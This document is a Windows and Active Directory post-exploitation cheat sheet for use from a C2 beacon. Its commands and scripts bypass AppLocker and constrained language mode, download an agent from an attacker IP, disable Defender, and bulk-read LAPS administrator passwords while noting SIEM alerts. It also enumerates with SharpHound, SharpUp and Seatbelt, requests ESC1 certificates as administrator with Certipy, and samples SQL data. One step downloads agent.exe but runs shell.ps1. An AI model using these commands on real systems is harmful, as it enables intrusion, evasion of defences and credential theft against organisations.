
Windows recon

Some of the commands below (execute-assembly, sharp-hound-4, sharpview, sharpup) are meant to be run from a Sliver beacon, but they can be used with other C2 frameworks with minimal changes.

Applocker

  • Applocker policies
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
  • Powershell language mode
$ExecutionContext.SessionState.LanguageMode

Test AppLocker Policy

# -Local only tests the local policy; use -Effective to test what is actually enforced (local + GPO)
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path C:\Windows\System32\cmd.exe -User Everyone
# PowerShell version, and whether the v2 engine (which does not enforce constrained language mode) can still be started
$PSVersionTable
powershell -version 2 -c '$ExecutionContext.SessionState.LanguageMode'
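The checks above combined into one script, as an added example that is not part of the original page: it lists the effective path rules, tests a set of commonly abused signed binaries against the effective policy for Everyone, probes the usual user-writable folders under C:\Windows (a path-allowed, user-writable directory is the classic AppLocker bypass), and reports the language mode plus whether the v2 engine starts. The candidate binary and folder lists are assumptions; adjust them to the host.

```powershell
# Added example, not from the original page.
# 1. Path-based allow/deny rules in the effective policy (per collection type).
$policy = Get-AppLockerPolicy -Effective
if (-not $policy.RuleCollections -or $policy.RuleCollections.Count -eq 0) {
    Write-Warning 'No effective AppLocker rule collections: nothing is enforced.'
}
foreach ($coll in $policy.RuleCollections) {
    foreach ($rule in $coll) {
        if ($rule.PathConditions) {
            [pscustomobject]@{
                Collection = $coll.RuleCollectionType
                Action     = $rule.Action
                Principal  = $rule.UserOrGroupSid
                Path       = ($rule.PathConditions.Path -join ', ')
            }
        }
    }
} | Format-Table -AutoSize

# 2. What would a standard user be allowed to run? (candidate list is an assumption)
$candidates = @(
    'C:\Windows\System32\cmd.exe',
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe',
    'C:\Windows\System32\regsvr32.exe',
    'C:\Windows\System32\rundll32.exe',
    'C:\Windows\System32\mshta.exe'
) | Where-Object { Test-Path $_ }

# PolicyDecision is Allowed / Denied / AllowedByDefault / DeniedByDefault;
# MatchingRule names the rule (path, publisher or hash) that produced it.
$policy | Test-AppLockerPolicy -Path $candidates -User Everyone |
    Select-Object FilePath, PolicyDecision, MatchingRule |
    Format-Table -AutoSize

# 3. User-writable folders under C:\Windows (commonly covered by the default
#    "%WINDIR%\*" allow rule). List is an assumption, not exhaustive.
$probe = @(
    'C:\Windows\Tasks', 'C:\Windows\Temp', 'C:\Windows\tracing',
    'C:\Windows\System32\spool\drivers\color', 'C:\Windows\System32\Tasks'
)
foreach ($dir in $probe | Where-Object { Test-Path $_ }) {
    $f = Join-Path $dir ('al_{0}.tmp' -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($f, 'x')   # create, then clean up immediately
        Remove-Item $f -Force
        "writable:     $dir"
    } catch {
        "not writable: $dir"
    }
}

# 4. Language mode of this session, and whether the v2 engine is usable.
"Language mode: $($ExecutionContext.SessionState.LanguageMode)"
$v2 = & powershell.exe -version 2 -nop -c '$PSVersionTable.PSVersion.ToString()' 2>$null
if ($LASTEXITCODE -eq 0 -and $v2) {
    "PowerShell v2 engine available: $v2"
} else {
    'PowerShell v2 engine not available (.NET 3.5 missing or v2 disabled)'
}
```

Run it as the low-privilege user you are assessing; the write probes leave no files behind but do generate file-create events, so expect them to show up in EDR telemetry.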

Bypass Applocker

PSByPassCLM

ired.team article

# stage the payload, then launch from the PowerShell v2 engine, which does not enforce constrained language mode
# (only works if the v2 engine / .NET 3.5 is present and PowerShell v2 has not been disabled)
Invoke-WebRequest -Uri http://10.10.10.x/agent.exe -OutFile agent.exe
powershell -version 2 -nop -noexit -exec bypass -c '.\shell.ps1'

System Info

  • Tasklist
tasklist /svc
ps
  • Logged-In Users
query user
qwinsta /server:127.0.0.1
  • Windows Defender
Get-MpComputerStatus
# or (sc.exe, not the PowerShell alias sc = Set-Content)
sc.exe query windefend

BONUS: Disable Defender

# needs local admin; silently has no effect when Tamper Protection is on, and the change is logged (Defender Operational event 5001)
Set-MpPreference -DisableRealtimeMonitoring $true
  • LAPS (LAPSToolkit)
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers

BONUS: Read LAPS password (if possible)

# Windows LAPS module (built into Windows since the April 2023 updates); COM is the computer name.
# Legacy LAPS exposes the same through the AdmPwd.PS module instead.
Get-LapsADPassword -Identity COM -AsPlainText
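As an added example that is not part of the original page, the following script enumerates every computer managed by either legacy LAPS (ms-Mcs-AdmPwd*) or Windows LAPS (msLAPS-*) and reads whatever the current account is permitted to see, using only DirectorySearcher, so it works from a plain domain-joined session without the ActiveDirectory or LAPS modules. The attribute names are the documented LAPS schema attributes; the helper names and output layout are the example's own.

```powershell
# Added example, not from the original page.
function Get-FirstValue($props, [string]$name) {
    # ResultPropertyCollection keys are lower-case. An attribute the caller
    # cannot read is simply absent, so no access error is raised.
    if ($props.Contains($name) -and $props[$name].Count -gt 0) { return $props[$name][0] }
    return $null
}

function ConvertFrom-FileTime($value) {
    # Both expiration attributes are large integers holding a FILETIME.
    if ($null -eq $value) { return $null }
    try { [DateTime]::FromFileTimeUtc([int64]$value) } catch { $null }
}

# Expiration attributes are readable by all authenticated users by default,
# so they reliably identify LAPS-managed hosts even when the password is not readable.
$searcher = [adsisearcher]'(&(objectCategory=computer)(|(ms-Mcs-AdmPwdExpirationTime=*)(msLAPS-PasswordExpirationTime=*)))'
$searcher.PageSize = 500
[void]$searcher.PropertiesToLoad.AddRange([string[]]@(
    'name', 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime',
    'mslaps-password', 'mslaps-passwordexpirationtime', 'mslaps-encryptedpassword'
))

$results = foreach ($r in $searcher.FindAll()) {
    $p         = $r.Properties
    $legacyPwd = Get-FirstValue $p 'ms-mcs-admpwd'
    $newJson   = Get-FirstValue $p 'mslaps-password'
    $encrypted = Get-FirstValue $p 'mslaps-encryptedpassword'

    $newAccount = $null; $newPwd = $null
    if ($newJson) {
        # Windows LAPS clear-text form is JSON: {"n":"<account>","t":"<filetime hex>","p":"<password>"}
        $j = $newJson | ConvertFrom-Json
        $newAccount = $j.n
        $newPwd     = $j.p
    }

    [pscustomobject]@{
        Computer      = Get-FirstValue $p 'name'
        LegacyPwd     = $legacyPwd
        LegacyExpires = ConvertFrom-FileTime (Get-FirstValue $p 'ms-mcs-admpwdexpirationtime')
        LapsAccount   = $newAccount
        LapsPwd       = if ($newPwd) { $newPwd }
                        elseif ($encrypted) { '<encrypted: decrypt with Get-LapsADPassword as an authorised principal>' }
                        else { $null }
        LapsExpires   = ConvertFrom-FileTime (Get-FirstValue $p 'mslaps-passwordexpirationtime')
    }
}

# Managed computers with no password returned are the ones this account cannot
# read; Find-AdmPwdExtendedRights / Find-LAPSDelegatedGroups show who can.
$results | Sort-Object Computer | Format-Table -AutoSize
$readable = @($results | Where-Object { $_.LegacyPwd -or $_.LapsPwd }).Count
"$readable of $(@($results).Count) LAPS-managed computers readable as $env:USERDOMAIN\$env:USERNAME"
```

Reading ms-Mcs-AdmPwd or msLAPS-Password is itself an LDAP read that a well-tuned SIEM may alert on (Windows LAPS additionally audits password reads on the DC), so run this once and record the output rather than re-querying.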
  • Go-to Sharphound command
sharp-hound-4 -i -s -t 100 -- -c All
  • Get list of domain users
sharpview -t 1000 -- Get-DomainUser -Domain eu.junon.vl -Properties samaccountname
  • Simple privesc check
sharpup audit
  • Check if a proxy is enabled (Powershell)
# obsolete API; works in Windows PowerShell (.NET Framework) but throws on PowerShell 7
[System.Net.WebProxy]::GetDefaultProxy()
  • Get named pipes
get-childitem \\.\pipe\
[System.IO.Directory]::GetFiles("\\.\pipe\")
(get-childitem \\.\pipe\).FullName
  • Certipy ADCS enumeration, request and authentication
certipy find -username username@domain.com -password password -vulnerable -stdout
# or, for the legacy BloodHound ingestor format
certipy find -username username@domain.com -password password -vulnerable --old-bloodhound
# -upn only works on a template that lets the enrollee supply the subject (ESC1); on other templates the CA ignores it
certipy req -u 'username@domain.com' -p 'password' -dc-ip 10.10.10.10 -ca 'name-DC-CA' -template 'templateName' -upn 'administrator@domain.com' -target 'DC.domain.com' -key-size 4096
certipy auth -pfx administrator.pfx -dc-ip '10.10.10.10' -username 'administrator' -domain domain.com
  • Seatbelt (useful commands)
execute-assembly -i -E seatbelt.exe -group=system
execute-assembly -i -E seatbelt.exe InternetSettings
  • Windows Services
sc.exe query
Get-Service | fl
  • Domain trusts
# powerview
Get-DomainTrust -Domain domain.com
# ActiveDirectory module
Get-ADTrust -Filter *
# built-in
nltest /domain_trusts
  • Enumerate domain shares
Find-DomainShare -ComputerDomain domain.com -CheckShareAccess
  • Enumerate databases (PowerUpSQL)
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "KEYWORD" -SampleSize 5 | select instance, database, column, sample | ft -autosize
# the openquery() calls run the inner query on the linked server HOSTNAME, using the linked-server login's rights
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select * from information_schema.tables')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select column_name from master.information_schema.columns')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select top 5 OrgNumber from master.dbo.VIPClients')"